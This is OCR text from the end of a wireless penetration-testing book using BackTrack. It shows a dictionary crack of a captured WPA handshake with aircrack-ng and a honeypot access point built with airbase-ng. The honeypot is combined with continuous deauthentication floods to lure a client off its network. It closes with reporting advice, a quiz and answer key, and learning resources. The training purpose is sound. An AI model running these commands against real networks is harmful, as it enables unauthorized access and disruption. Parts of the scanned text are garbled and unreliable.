Menu, Edit View Bookmarks Settings Help 





CH 1 ][ Elapsed: 2 mins ][ 2011-04-28 13:47 ][ WPA handshake: 00:21:91:D2:8E:25 


BSSID PWR RXQ Beacons #Data, #/s CH MB  ENC CIPHER AUTH ESSID 
00:21:91:D2:8b:25 -35 100 1358 542 14 1 54e. WPA TKIP PSK Wireless Lab 
BSSID STATION PWR Rate Lost Packets Probes 


00:21:91:D2:8bE:25 )00:22:FB:35:FC:44 -20 2e-48e 1 576 





5. Westartaircrack-ng to begin a dictionary attack on the handshake: 


root@bt: ~ - Shell No. 3 - Konsol 
Session Edit View Bookmarks Settings Help 


root@bt:~# aircrack-ng -b 00:21:91:D2:8E:25 -w words WPA-PSK-01.cap fj 





6. As the passphrase was easy, we were able to crack it using the dictionary as shown 
in the following screenshot: 


Lr root@bt: ~ - Shell No. 3 - Konsole 
|Menu] Edit View Bookmarks Settings Help 





Aircrack-ng 1.1 r1738 


00] 1 keys tested (118.33 k/s) 


KEY FOUND! [ 12345678 ] 


Master Key : EE F4 D4 7C 
D4 EF 5C AA 


Transient Key : 68 BO 5A 61 
BO CE AF 93 
7A 9A EB A4 
1C 4D E2 3F 


EAPOL HMAC : 63 20 99 FB 
root@bt:~# 
root@bt :~# 
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Even though WPA-PSK can be made practically unbreakable by choosing a strong passphrase, 
the administrators of this network made the critical mistake of choosing an easy to 
remember and use passphrase. This led to the compromise of the network using the simple 
dictionary-based attack. 





“LOTI OA: er 
In this section, we will explore if we can force a client to associate with us. This will open up 
further opportunities to compromise the client's security. 





Time for action - compromising the clients 


Follow the given instructions to get started: 
1. Letusrevisit the client section of theai rodump- ng screenshot: 


BSSID STATION Rate Lost Packets Probes 


5 vivek 

1 

2 Mesh-320833000058-12 
15 Vivek 
39 Wireless Lab, Vivek 

7 


(not associated) 
(not associated) 
(not associated) 
00:21:91:D2:8E:25 
00:21:91:D2:8E:25 
00:1E:40:53:02:FC 
40:4A:03:AB:EB:E2 
00:22:7F:25:0A:99 
AC:67:06:32:AC:99 


ui 
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' 

ui 


ui 
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2. Wesee that the authorized client has two networks in its preferred network 
list—Wi rel ess Lab andVi vek. Let us first create an access point Vi vek using 
alrbase-ng: 


n Edit View Bookmarks Settings Help 








Irootabt :-£f airbase-ng --essid Vivek mono 


14:42:39 Created tap interface at0 
14:42:39 Trying to set MTU on at0 to 1500 
14:42:39 Access Point with BSSID 00:C0:CA:3E:BD:93 started. 
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3. Let us now disconnect the client forcefully from Wi rel ess Lab by continuously 
sending de-authentication messages: 


oot@bt:~# 

oot@bt:-# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mond 

4:43:12 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 1 
B: this attack is more effective when targeting 

à connected wireless client (-c «client's mac»). 
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4. The client now searches for available access points and connects to Vi vek: 


Lr root@bt: ~ - Shell No. 3 - Konsole 


Session Edit View Bookmarks Settings Help 





rootabt:-# airbase-ng --essid Vivek mond 

14:42:39 Created tap interface at0 

14:42:39 Trying to set MTU on at0 to 1500 

14:42:39 Access Point with BSSID 00:C0:CA:3E:BD:93 started. 


14:43:32 Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Vivek" 
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X 52V: 4 
We used the preferred network list of the client and created a honeypot access point with 
the same SSID. We then forcibly disconnected the client from the authorized access point. 
The client then started searching for all available access points, and found Vi vek also to be 
available in the vicinity. It then connected to Vi vek that is controlled by us. 





A LOVE: 

^ iN 

Now that we have found all these security vulnerabilities, we need to report them to 
the Enterprise. Every penetration testing company would have its own report structure. 
However, it must at least contain the following details: 

Vulnerability description 

Severity 

Affected devices 

Vulnerability type—software / hardware / configuration 


Workarounds 


Oy Mee eS dp 


Remediation 


The preceding structure would give enough information to a network or security 
administrator to find and patch the vulnerability. At this point the penetration tester can only 
provide support to the administrator to help him understand the vulnerabilities, and maybe 
propose best practices to secure his network. 





Pop quiz — Wireless Penetration Testing 


1. We can detect a rogue access point using? 


a. IP addresses 
b. MAC addresses 
c. Bothaandb 


d. None ofthe above 


2. Client mis-association can be prevented by 
a. Requiring user intervention before connecting to an access point 
b. Only keeping authorized networks in the preferred network list 
c. Using WPA2 
d. Notusing WEP 


WLAN Penetration Testing Methodology 


3. Inthe Reporting phase, which do you think decided the importance of 
the vulnerability? 


a. 
b. 
C. 
d. 


Description 
Severity 
Affected devices 
Both (b) and (c) 


4. In client attacks, which option in ai rbase- ng allows us to reply to all probing clients? 


a. 
b. 
C. 
d. 


MOOR 


-a 
--essid 
- P 
-C 


In this chapter, we have learned how to conduct a wireless penetration test using BackTrack. 
Depending on the size of the network, the actual complexity and time taken could be quite 
large. We have taken a small network to illustrate the various phases and techniques you 
would use to run a penetration test. 
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"| do not know what I may appear to the world; but to myself | seem to 
have been only like a boy playing on the seashore, and diverting myself in 
M now and then finding a smoother pebble or a prettier shell than ordinary, 
whilst the great ocean of truth lay all undiscovered before me." 
Sir Issac Newton 


Though we have reached the end of the book, we must always be eager to 
learn more and remain a student forever! 


We've finally come to the end of this book but hopefully, this is just the beginning of your 
journey in Wi-Fi security. In this chapter, we will explore the next steps in your learning path 
as a wireless penetration tester. 


It's been an exciting journey in the last 10 chapters! We started with setting up a basic lab 
for Wi-Fi and ended with conducting attacks on PEAP and WPA-Enterprise. We've definitely 
come a long way. 


However, the journey has not ended yet, and honestly may never end. Wi-Fi security is 

a constantly evolving field and new attacks, tools, and techniques are being discovered, 
disclosed, and released every month. It is important to stay informed and updated in order 
to be a good penetration tester. 


In this chapter, we will look at how to set up a more advanced lab, and we will touch upon 
various resources you can use to stay in touch with the latest happenings in this field. 


Conclusion and Road Ahead 


The lab we have created for this book is a barebones one and is great to get you started in 
the world of wireless security. However, you would require a more advanced lab, if you plan 
to pursue a career in Wi-Fi security and penetration testing. 


Here are a couple of additional items you could consider purchasing: 
Directional Antennas: 


Directional Antennas could be used to boost the signal and help detect more Wi-Fi networks 
from afar. This can come in handy when the penetration test involves a large facility, which 
might be difficult to cover by foot. 


There are different types of antennas suited for various purposes. It might be worthwhile to 
do some research on this topic before making a purchase. 





Wi-Fi Access Points: 


It may be interesting to experiment with different access points using 802.11 a/b/g/n, and 
SO On, as one can never really be sure what he may find in the field. Though, fundamentally 
from an auditing perspective the techniques remain the same, in some rare cases the 
manufacturers may have added their own security patches to combat issues. It might be 
good to have experience with a varied set of access points: 
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Wi-Fi Cards: 


We have used the Alfa card for our lab sessions throughout this book. There are other USB- 
based and in-built cards on the laptops which could also be used with the right drivers for 
Wireless Penetration Testing purposes. It might be a good idea to explore some of these 
cards and drivers. This might come in handy when you are confronted with a situation where 
the Alfa card fails and you have to default to the in-built or other cards. 
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Conclusion and Road Ahead 
Smartphones and other Wi-Fi enabled devices: 


In today's world, laptops are not the only Wi-Fi enabled devices. Almost every mobile 
device has Wi-Fi included in it—Smartphones, tablets, and so on. It might be a good idea to 
purchase a variety of these devices and use them in the labs: 
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Staying up-to-date 


Security is a very fast advancing field and you will find that if you are out of touch for even a 
short period of a couple of months, part of your knowledge may become obsolete. In order 
to stay up-to-date, we recommend using the following avenues: 


Mailing Lists: 


http:// www.securityfocus.com/ has multiple mailing lists, which are focused 
discussion groups for technical discussions. Among others, we would recommend 
subscribing to the Wi f i sec@securityfocus.comto stay in touch with the latest updates 
in the field. 


Websites: 


The Aircrack-NG site is the best resource to stay updated on new tools in this suite. Created 
by Thomas d'Otreppe a.k.a Mister X this is probably the best tool out there for WLAN 
hacking: 


http:// www.aircrack-ng.org 


Appendix A 


Among my personal favorites is Raul Siles' website which contains a detailed list of tools, 
papers, research articles, conference materials, and much more, all dedicated to wireless 
security: 


http://www.raulsiles.com/resources/wifi.html 


Joshua Wright's blog, though not very regularly updated, is the definitive place for the latest 
on WPA-Enterprise attacks: 


http://www. will hackforsushi.com/ 
Conferences: 


Hacker and Security conferences such as Defcon and Blackhat have excellent talks and 
workshops each year on various topics in security, including wireless security. Most of these 
talk videos and course materials are released free of charge online. It would be good to 
follow these conferences: 

€ Defcon: http://www. defcon. org 


€ Blackhat: http://www. blackhat.com 
BackTrack-Related: 


BackTrack as a platform is evolving constantly. It's important to ensure that your copy is 
always the latest and greatest! The following websites are the first place for any release 
announcements: 


€ BackTrack website: http://www. backtrack-li nux.org 


€ Offensive security: ht tp: / / www. off ensi ve-security.com 


"EOLA: N 


1. Hope you enjoyed this book and the different exercises in it. Hopefully, by now you 
should be able to conduct penetration tests on wireless networks with ease using 
BackTrack. Our final advice to you would be always be a student and keep learning! 
This is what will keep you sharper than the rest of the competition. 


2. We wish you all the best for a career in wireless penetrating testing! 
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Chapter 1, Wireless Lab Setup 


Run the command! f config wl an0.Inthe output, you should see a flag "UP", 
this indicates that the card is functional. 


2) You will only need a hard drive if you would like to store anything across reboots 
like configuration settings or scripts. 
It shows the ARP table on the local machine. 
We would use WPA Supplicant. 





Chapter 2, WLAN and its Inherent Insecurities 


1) b) Management frames with sub-type as authentication would be responsible for 
WLAN authentication. 


b) The naming starts from monO to monX, so the second interface will be mont. 


3) To do this we will have to use the option which is the complement of the filter for 
selecting all Beacon frames. This is a). 





Pop Quiz Answers 


Chapter 3, Bypassing WLAN Authentication 


d) All of the above will have the same effect as the client would connect back. 


b) Open Authentication provides no security at all. 


3) a) We derive the keystream from the packets and re-use it for responding to the 
next challenge. 


Chapter 4, WLAN Encryption Flaws 


ao c) Encrypted ARP packets are used for a replay attack. 


a) WEP can be always broken no matter what the key used is or which access point 
is running it. 

b) WPA-PSK can be cracked only if a weak passphrase which can appear in a 
dictionary is chosen. 


Chapter 5, Attacks on the WLAN Infrastructure 


ru a) Rogue Aps typically do not use any encryption. 


a) If two access points have the same MAC address and SSID, differentiating 
a" T — them is a difficult task. 








|3) | a) Typically a DoS attack brings down the network and makes it unusable. — Typically a DoS attack brings down the network and makes it unusable. 


4—3 a) Rogue Aps allow for a backdoor entry into the authorized network. 
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b) The Caffe Latte attack can help recover the WEP key from the client. 


2) a) Honeypots will typically use no encryption and open authentication so that 
clients can connect to them easily. 


4) b) Caffe Latte can only recover the key if the client has the WEP key for the 
authorized network, cached, and stored on it. 
Chapter 7, Advanced WLAN Attacks 


b) In all man-in-the-middle attacks, it's always the attacker who is in the middle. 
BENE Prspoot spats ONS responses ek sens, OO b) Dnsspoof spoofs DNS responses to hijack sessions. 


[3 |  |cSsIDdoesnothaveanyroletoplayin MTMs. =i SSID does not have any role to play in MITMs. 


m a) atO is the wired side of the software-based access point created byai rbase- 
ng. 


b) FreeRadius-WPE is a patch written by Joshua Wright to the original FreeRadius 
server. 








2) b) PEAP can be attacked by having a gullible client accept the server-side fake 
certificate provided by the attacker. 
d) EAP-TLS uses both client and server-side certificates. 
b) EAP-TTLS uses server-side certificates. 





Pop Quiz Answers 


Chapter 9, Wireless Penetrating Testing Methodology 


d) It is non-trivial to detect rogue access points and using simple bindings like IP 
and MAC will not work in most cases. 


a) If the user has to approve every access point before a connecting to it, then most 
mis-association attacks could be prevented. 
d) A severe defect in an important device on the network would be the most 
important vulnerability to fix. 


c) The - P option is for making airbase-ng respond to all probes. 
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